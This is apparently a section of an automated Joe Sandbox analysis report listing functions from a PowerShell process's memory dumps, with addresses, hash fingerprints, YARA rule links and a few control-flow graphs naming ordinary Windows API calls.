                                                                                                                  • API String ID: 31276548-0
                                                                                                                  • Opcode ID: eab167d2c86b4a198f455d4244c4984433d857e564667cbef27b908076adf6da
                                                                                                                  • Instruction ID: 4e26f8d5aa16bd410bed6aa8fa6aeb711f8c2be9462cecc098b319f1148e695f
                                                                                                                  • Opcode Fuzzy Hash: eab167d2c86b4a198f455d4244c4984433d857e564667cbef27b908076adf6da
                                                                                                                  • Instruction Fuzzy Hash: DF41113190CA4D4FE718EB6D98467F97BE0EF56321F0042BBD48DC3192EA68B446CB81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8955A Relevance: .3, Instructions: 346COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9597c9315cdf7f710e3384c850eb6db8e425e796edbc552f26097e0d29ee27d5
                                                                                                                  • Instruction ID: 0058a29d9c9d3b6ccf32f61a899c3fabbe5c9cdff39028ec1cc3d248f81d207c
                                                                                                                  • Opcode Fuzzy Hash: 9597c9315cdf7f710e3384c850eb6db8e425e796edbc552f26097e0d29ee27d5
                                                                                                                  • Instruction Fuzzy Hash: A3B15E30A18A1D8FDB98DF28C8547B9B3E1FB59311F5041BDD14ED76A1CA75A882CB80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB89563 Relevance: .3, Instructions: 300COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 977d806d7ddd7b4479ad262817d304d682e62a2b85caabc2d40cb3be585a2540
                                                                                                                  • Instruction ID: fb200d553037241a7465d70fcb04a8aee501e206275758dca4dd81229087b663
                                                                                                                  • Opcode Fuzzy Hash: 977d806d7ddd7b4479ad262817d304d682e62a2b85caabc2d40cb3be585a2540
                                                                                                                  • Instruction Fuzzy Hash: BBA14E70A18A1D8FDB98DF2CC855B79B7E1FB59311F1041BED14ED76A2CA70A982CB40
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1C9D38 Relevance: .3, Instructions: 300COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 01e27a7bafcb0d4d0080fcd73a2166027a5e4741133843c014a267f03ead0b14
                                                                                                                  • Instruction ID: 1c4dc6810440ea27a46603b9b235550e4557ce766a4c46e1a6a5f796bf512e96
                                                                                                                  • Opcode Fuzzy Hash: 01e27a7bafcb0d4d0080fcd73a2166027a5e4741133843c014a267f03ead0b14
                                                                                                                  • Instruction Fuzzy Hash: C0817A30B1CA490FD369EF3C945527677E2FBDA31471586BBC05ACB2E2DE29E9428740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF59BC2 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 485 7ff9baf59bc2-7ff9baf59c48 489 7ff9baf59c4a-7ff9baf59c4f 485->489 490 7ff9baf59c52-7ff9baf59c84 GetFileAttributesW 485->490 489->490 491 7ff9baf59c8c-7ff9baf59cb1 490->491 492 7ff9baf59c86 490->492 492->491
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: 00285aa9eceaa9a4cbddb63d317945ea22858f1d650e8d08e25a685726470710
                                                                                                                  • Instruction ID: df9444fbc8a4c1d298b6fe35028a4c1ea24e516f86bdda2ff056a6f43485b3f9
                                                                                                                  • Opcode Fuzzy Hash: 00285aa9eceaa9a4cbddb63d317945ea22858f1d650e8d08e25a685726470710
                                                                                                                  • Instruction Fuzzy Hash: E631283180CB8C4FDB59DBA8C8496E9BFF0EF56320F0482AFD049D7152CB646806CB81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF6C548 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 494 7ff9baf6c548-7ff9baf6c66c ComputeAccessTokenFromCodeAuthzLevel 502 7ff9baf6c66e 494->502 503 7ff9baf6c674-7ff9baf6c6a3 494->503 502->503
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AccessAuthzCodeComputeFromLevelToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 132034935-0
                                                                                                                  • Opcode ID: e73b7c583c5acb12229e7e0fa65013a1bfadf4f32658cc30c03e943cd7467f1d
                                                                                                                  • Instruction ID: 87a7ce43975ef3ccd6e95253bbb656f95d348afb1dda63bb191b32c4ab650bea
                                                                                                                  • Opcode Fuzzy Hash: e73b7c583c5acb12229e7e0fa65013a1bfadf4f32658cc30c03e943cd7467f1d
                                                                                                                  • Instruction Fuzzy Hash: D631E43690CA585ED704E76DB4026E87BE0EF45334F0482BBD08E9B143D62474568FC9
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BAF6629A Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2067232385.00007FF9BAF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BAF50000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9baf50000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1431151113-0
                                                                                                                  • Opcode ID: 95e24f45854db049cd4a3714c1d3b6dde5a977d810802fef3d56f16f5b9b3980
                                                                                                                  • Instruction ID: 0f75da44e4dfc3489d05982c61c4f0cfd163d7ceace4640694d04f4c298251fe
                                                                                                                  • Opcode Fuzzy Hash: 95e24f45854db049cd4a3714c1d3b6dde5a977d810802fef3d56f16f5b9b3980
                                                                                                                  • Instruction Fuzzy Hash: 53219131908A188FDB98DF4DD8857E8F3F0FB59311F0082DAC54DD7251CA74AA958F81
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5719F0 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: 56aa34c2f6c4f27e06786468d26355f72951e51c3b6c4b7d6d75db17ad260220
                                                                                                                  • Instruction ID: 3e33a3e9fecbc8fabdfce8d636272450409170af5010c16594882818490e9885
                                                                                                                  • Opcode Fuzzy Hash: 56aa34c2f6c4f27e06786468d26355f72951e51c3b6c4b7d6d75db17ad260220
                                                                                                                  • Instruction Fuzzy Hash: 6D118131A6CE8A0BD355EB2CA4413B6B3E1FF85210B50457ED14FC21D7DE6AF8568741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB571A05 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: 2500b78061873cb7d81e6c0e51e638f04cd423c25b862453e137592efb138890
                                                                                                                  • Instruction ID: 084c371eb0e888a28ecb6db06850cf3c42d07c3f48d7dba9e9eafde30b73d453
                                                                                                                  • Opcode Fuzzy Hash: 2500b78061873cb7d81e6c0e51e638f04cd423c25b862453e137592efb138890
                                                                                                                  • Instruction Fuzzy Hash: 90119131A1DE890BD358EB3C64022B5B2E1FF46210740047ED14BC3597DD69B9058741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5719A9 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: 162d4ff307d1c429100201e703a3233e5d4ec5be639da8012c931471031c9669
                                                                                                                  • Instruction ID: 66a5a31b18f881b8bde0f5650fed17a0e0e50a427afedc0babd71c11fad7472e
                                                                                                                  • Opcode Fuzzy Hash: 162d4ff307d1c429100201e703a3233e5d4ec5be639da8012c931471031c9669
                                                                                                                  • Instruction Fuzzy Hash: 2F115131B2CE494BD758EB6CA4412B6B2E1FF95310B50457ED14FC2596DE6AF9028740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5719BB Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: 671dde38446a54b224ee85b8abe60920c5b4fb34d98cfb09c542fb39cb4ab8e1
                                                                                                                  • Instruction ID: 35ab160e314447838fd25a8177dcff74e8bf1db19b9cf6fad7b3ddf3111539f3
                                                                                                                  • Opcode Fuzzy Hash: 671dde38446a54b224ee85b8abe60920c5b4fb34d98cfb09c542fb39cb4ab8e1
                                                                                                                  • Instruction Fuzzy Hash: CF018031B2CE490BE258EF6CA4412B5B2E2FF89310740443ED14FC32D6DEAAF9028740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5719D9 Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: 9695c9956a51c3467af7624e1a09228bb29d828f9ce5c3c4de0f7260f7d73a76
                                                                                                                  • Instruction ID: ca1ff939c7ba4e08787a86be7c0d1005feccceb56f7d7acb5ecc394c274b406b
                                                                                                                  • Opcode Fuzzy Hash: 9695c9956a51c3467af7624e1a09228bb29d828f9ce5c3c4de0f7260f7d73a76
                                                                                                                  • Instruction Fuzzy Hash: B1F0FF31A5CA194BE258EB6CA4022B972E2FB89310B50057ED14FC36D6DD6AB9428781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB5719E5 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #L
                                                                                                                  • API String ID: 0-636677702
                                                                                                                  • Opcode ID: ef6fab9e7dcbc9bbd92ce1650a01a8247b2142b48633f23d656baf169b95ca30
                                                                                                                  • Instruction ID: f9c44095e086ffddfe2af87be99e8ec62f1b2a7df749c8d881050b1661fd5217
                                                                                                                  • Opcode Fuzzy Hash: ef6fab9e7dcbc9bbd92ce1650a01a8247b2142b48633f23d656baf169b95ca30
                                                                                                                  • Instruction Fuzzy Hash: 85F05431B5CA194BD258EB2CA4012B5B3E1FF85310B50057ED14BC36D7DD77B9418781
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB4181D1 Relevance: .6, Instructions: 621COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 980a54588986b418450e8597e67fb51827eb657a8dd8ca3ea165b93ba45292fc
                                                                                                                  • Instruction ID: 99b656d1f580f64c8e3b98ab40af40099be2e18ab83f89b6066d9b1efb8c4513
                                                                                                                  • Opcode Fuzzy Hash: 980a54588986b418450e8597e67fb51827eb657a8dd8ca3ea165b93ba45292fc
                                                                                                                  • Instruction Fuzzy Hash: 5D02B121E1CA094FEB98EF1C94917B97BE2FF99314F11407AE51EC32D2DD38A9418741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB40E6DA Relevance: .5, Instructions: 533COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d718eabb19b7653e7686efc14b1f900aa6b6b3ed5502e36800b924d7958e4b6
                                                                                                                  • Instruction ID: af9a4dc62f744145dd911097cee0cc295484322f14b42ca2e358bf4c0e698e7f
                                                                                                                  • Opcode Fuzzy Hash: 6d718eabb19b7653e7686efc14b1f900aa6b6b3ed5502e36800b924d7958e4b6
                                                                                                                  • Instruction Fuzzy Hash: CBF1BB31E48A4A8BEB98DF2C84917B977E2FF99704F440079D54EC72E6CE69B852C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB899F1 Relevance: .5, Instructions: 517COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3a625b81ef65b33f78d5be47fc16cc5f70223f670cb29cd3b8bd64fed1972a71
                                                                                                                  • Instruction ID: b1a6c97d77064136a3d4e7f1a41fd2a0169ea3ff5d060e28ed3a1682fe736b0d
                                                                                                                  • Opcode Fuzzy Hash: 3a625b81ef65b33f78d5be47fc16cc5f70223f670cb29cd3b8bd64fed1972a71
                                                                                                                  • Instruction Fuzzy Hash: BAF1F631D1CA9A4FEB59EB6C88517A9BBE1FF55300F54017AD08ED76E2DD68B802C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB40E729 Relevance: .5, Instructions: 465COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2095923331.00007FF9BB3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB3F0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb3f0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 43179c6844064b230484296d5eb7fdeb422bbdd8d36d00b02ca9cd05d7c0b905
                                                                                                                  • Instruction ID: 6699b5771dbcd60d86f596332c6ca32075b405ae20db98c0ac1d60eb1e39658f
                                                                                                                  • Opcode Fuzzy Hash: 43179c6844064b230484296d5eb7fdeb422bbdd8d36d00b02ca9cd05d7c0b905
                                                                                                                  • Instruction Fuzzy Hash: BDE1BD31E4CA4A4BEB98DF2C84517B977E2FF99704F8400B9D54EC72E6CE68B852C640
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB92E1A Relevance: .5, Instructions: 453COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 842b22c1af8d4a5701def2109e571ffeeaa3db1be56892d8aa94e9926045f796
                                                                                                                  • Instruction ID: 33a951d49bc949f1199f08d37bc975e0cc3e57afa256b85ec6c6266a2c2b4356
                                                                                                                  • Opcode Fuzzy Hash: 842b22c1af8d4a5701def2109e571ffeeaa3db1be56892d8aa94e9926045f796
                                                                                                                  • Instruction Fuzzy Hash: 2DE19431A0DE9A4FEB95DF2C88597B97BE1FF99300B0500B9D58DC72E2CE68A905C741
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA04E35 Relevance: .4, Instructions: 426COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 74129cec4160a7b37493de929df5aecc795b4a27f5bdfbd4fd907eb4afa2fd99
                                                                                                                  • Instruction ID: a6e311bb6132388d1451a26a811310b5ab5448e5101cb6d1e2c0b69cd78fe5ec
                                                                                                                  • Opcode Fuzzy Hash: 74129cec4160a7b37493de929df5aecc795b4a27f5bdfbd4fd907eb4afa2fd99
                                                                                                                  • Instruction Fuzzy Hash: 33D14C30A18A098FEB98EF1CC495BA977E2FF59700F5501AAD50DC72E2DE65FC418780
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB1C90D9 Relevance: .4, Instructions: 393COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2081153585.00007FF9BB1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB1C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb1c0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f2ad37b8d7a9740b5283595e5bbd9f5b140099f3326ef7d9a55af007096c386
                                                                                                                  • Instruction ID: b347c4490c06cfe19494d90e6f4fa2fc11138e6d3790bb52d77a7042e6b67f49
                                                                                                                  • Opcode Fuzzy Hash: 5f2ad37b8d7a9740b5283595e5bbd9f5b140099f3326ef7d9a55af007096c386
                                                                                                                  • Instruction Fuzzy Hash: D6A13712F1CE5A0BF279EE1C64863B922C1EF9A7A9B0541BAD54DC72E2DD1DFD0242C0
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BB575776 Relevance: .4, Instructions: 374COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2110578814.00007FF9BB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BB560000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bb560000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6fe1afb963266fc18b21db707e909c9f6ec6b703e57ca30bb25af44189666171
                                                                                                                  • Instruction ID: 42999260933d39b998db9d6da20b1490f08439d54972979706e19b38572ade56
                                                                                                                  • Opcode Fuzzy Hash: 6fe1afb963266fc18b21db707e909c9f6ec6b703e57ca30bb25af44189666171
                                                                                                                  • Instruction Fuzzy Hash: E7C1FE32A1CA464FE758DF1EE4426A57391FB90310F5005BDD19AC71E3DEAAB942C782
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8925D Relevance: .3, Instructions: 318COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2cc298b2e097e6bbd10ac434aad807ddff4cbc90d41453b1f145a72ef73d3bf8
                                                                                                                  • Instruction ID: bc8b0bb6eb371509d7f22b0629d4fed2d388a5d1b1370585dc21449a727ca13c
                                                                                                                  • Opcode Fuzzy Hash: 2cc298b2e097e6bbd10ac434aad807ddff4cbc90d41453b1f145a72ef73d3bf8
                                                                                                                  • Instruction Fuzzy Hash: 8BA16D31A08A198FEB98EF2C8851BA977E1FF99314F5441A9D04DD32D2DE75AD42CB80
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBA136ED Relevance: .3, Instructions: 283COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2149795165.00007FF9BBA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBA00000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bba00000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d6b7414313f9384c1d06c9e11f579e9ba37eaab66a5a91ae6898cbbee79902cf
                                                                                                                  • Instruction ID: 8a8e027ebabd2a804bc10f776879e3773adfc8cf9b7fb93f2709ca4980422ec2
                                                                                                                  • Opcode Fuzzy Hash: d6b7414313f9384c1d06c9e11f579e9ba37eaab66a5a91ae6898cbbee79902cf
                                                                                                                  • Instruction Fuzzy Hash: 93913831A0DA894FE795EF6C88652B97BE1FF5A210F0401BAD44DC72E3DE69B901C740
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8386E Relevance: .3, Instructions: 262COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2181b21a0309d79a9ceacc5efa26a54718f9ee164980dcf52afcaf92d1d7d145
                                                                                                                  • Instruction ID: 92f378fd01a11aec6227b272c3526ac90d4c3329dc50d3cdf0622e6288535249
                                                                                                                  • Opcode Fuzzy Hash: 2181b21a0309d79a9ceacc5efa26a54718f9ee164980dcf52afcaf92d1d7d145
                                                                                                                  • Instruction Fuzzy Hash: 78612A32A0D56A4EE719DE6CAC466F577D0FF42230F14017EE5CAC31E2E959B9838390
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 00007FF9BBB8A110 Relevance: .3, Instructions: 260COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000019.00000002.2163668862.00007FF9BBB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9BBB80000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_25_2_7ff9bbb80000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4e58ab4d6ae92e8f998e80493a9ef218fb1574cfe6fbddb864c15fc6b76d7ca5
                                                                                                                  • Instruction ID: e3cdcf45c57d65cba1c835c18632b5499d841fb804f1dcc2861445afcb65a05d
                                                                                                                  • Opcode Fuzzy Hash: 4e58ab4d6ae92e8f998e80493a9ef218fb1574cfe6fbddb864c15fc6b76d7ca5
                                                                                                                  • Instruction Fuzzy Hash: 8D81E530A0C95A4FE794EF2C884476AB7E1FF9A310F5546BAD14DC72E2DE68AC41C741
                                                                                                                  Uniqueness

